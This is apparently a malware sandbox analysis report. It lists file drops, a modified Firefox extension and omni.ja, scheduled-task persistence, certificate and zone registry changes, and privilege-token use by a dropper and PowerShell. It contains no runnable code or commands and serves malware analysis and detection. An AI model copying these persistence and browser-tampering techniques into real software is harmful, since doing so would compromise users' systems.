File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_89FBEB9EEBFF8AABF1EBFA20B87AFE7E C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_95776108E5303B05527E9B63C6628F47 C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_0E84AD23AC2E74B30DEF739614C7EB94 C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\7zSBEEB.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File created C:\Program Files (x86)\KDIdGNeaPBYNADfhwFR\IQlYoDq.dll C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File created C:\Program Files (x86)\JbudRisgU\stYkoL.dll C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File created C:\Program Files (x86)\KDIdGNeaPBYNADfhwFR\qrVDylp.xml C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File created C:\Program Files (x86)\VloXEwfyUAdsC\GzSTGHr.dll C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File created C:\Program Files (x86)\zpocSIDFTSWU2\bsDtJYQkaoKLI.dll C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File created C:\Program Files (x86)\BspasHMSlPUn\mtslXUt.dll C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File created C:\Program Files (x86)\JbudRisgU\nBtEyWy.xml C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File created C:\Program Files (x86)\VloXEwfyUAdsC\heGCxyl.xml C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File created C:\Program Files (x86)\zpocSIDFTSWU2\WrVVPHN.xml C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bqHlMUmkmlcBkJQYdf.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\upHNLFTuuiluCLfgh.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\lRoQVRoUFrjOsqP.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\QGYoMddbcQsigCFfl.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSBEEB.tmp\Install.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSBEEB.tmp\Install.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zSBEEB.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zSBEEB.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Users\Admin\AppData\Local\Temp\7zSBEEB.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{4f38e779-0000-0000-0000-d01200000000}\NukeOnDelete = "0" C:\Users\Admin\AppData\Local\Temp\7zSBEEB.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Users\Admin\AppData\Local\Temp\7zSBEEB.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Users\Admin\AppData\Local\Temp\7zSBEEB.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Users\Admin\AppData\Local\Temp\7zSBEEB.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
